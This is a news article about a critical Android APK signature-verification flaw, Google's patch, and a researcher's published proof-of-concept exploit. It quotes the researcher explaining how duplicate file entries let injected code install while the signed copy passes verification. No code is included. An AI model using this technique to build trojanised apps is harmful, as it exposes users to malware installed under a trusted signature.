Google patches critical Android threat as working exploit is unleashed

A security researcher has published working exploit code that allows attackers to surreptitiously turn legitimate apps running on Google's Android mobile operating system into malicious trojans. Around the same time, Google said it released a patch that helps protect users from abuse.

As previously reported, the weakness involves the way legitimate Android applications are cryptographically signed to ensure they haven't been modified by parties other than the trusted developer. Researchers at security startup Bluebox provided high-level details of the vulnerability last week, but omitted technical details most people would need to reproduce the attack. That didn't stop developers of CyanogenMod, an alternative Android firmware version, from piecing together the available details into this bug report that identifies the conditions necessary for exploiting the vulnerability. The report also incorporates the fix from Google into the CyanogenMod code.

Working from that description, Pau Oliva Fora, senior mobile security engineer at viaForensics, published proof-of-concept code that allows anyone with a moderate level of skill to modify an existing Android app without changing the cryptographic signature that's supposed to certify it hasn't been tampered with. The 32-line exploit demonstrates the ease in exploiting the vulnerability and the consequences the flaw might have for people who install and update apps from third-party sources.

"I think it's a very serious vulnerability, and everyone with an unpatched device should be cautious about what they install, especially if it doesn't come from an official distribution channel," Oliva Fora wrote in an e-mail to Ars.

He went on to say the exploit works by adding new code entries to an APK Android application file without removing the original entries inside it. The new entries contain the exact same file name as the originals, but with different content. The original entries are the ones that match the validation signature while the new entries, which can be booby-trapped with malicious code, are those that will be executed after installation.

"Android fails to check the signature properly on APKs that have duplicate file names inside," Oliva Fora explained. "The entry which is verified for signature is the second one inside the APK, and the entry which ends up being installed is the first one inside the APK (the injected one, that can contain the malicious payload and is not checked for signature at all). It can be exploited by creating a specially crafted APK file that contains the properly signed files and the malicious ones."

For their part, Google representatives said mitigations are in place to protect Android users against such attacks. Engineers have provided partners with a patch that's already shipping in smartphones from manufacturers such as Samsung, a Google spokeswoman said. What's more, the Google Play marketplace scans available apps for signs of the attack and Google's Verification Tool provides protection for Android users who download apps to their devices outside of Google Play. Google scanning tools have yet to uncover any evidence of the vulnerability being exploited in Google Play or other app stores.

In addition to being extremely wary of apps downloaded from third-party marketplaces, Oliva Fora said users can use this scanning app to detect if any apps installed on a smartphone are exploiting the vulnerability. He said exploits can also be blocked by Android antivirus apps, although it may take time for the protection to be added to individual packages.

It's good to hear Google has already taken precautions to protect against this vulnerability. It's also worth remembering that despite the introduction 17 months ago of a service that scours Google Play for malicious apps hackers, both whitehat and blackhat, have repeatedly found ways to bypass the measure. It also remains unclear if the patch Google has released is available on phones from other manufacturers. Until Bluebox researchers release more details at the Black Hat security conference later this month, readers should take this threat seriously.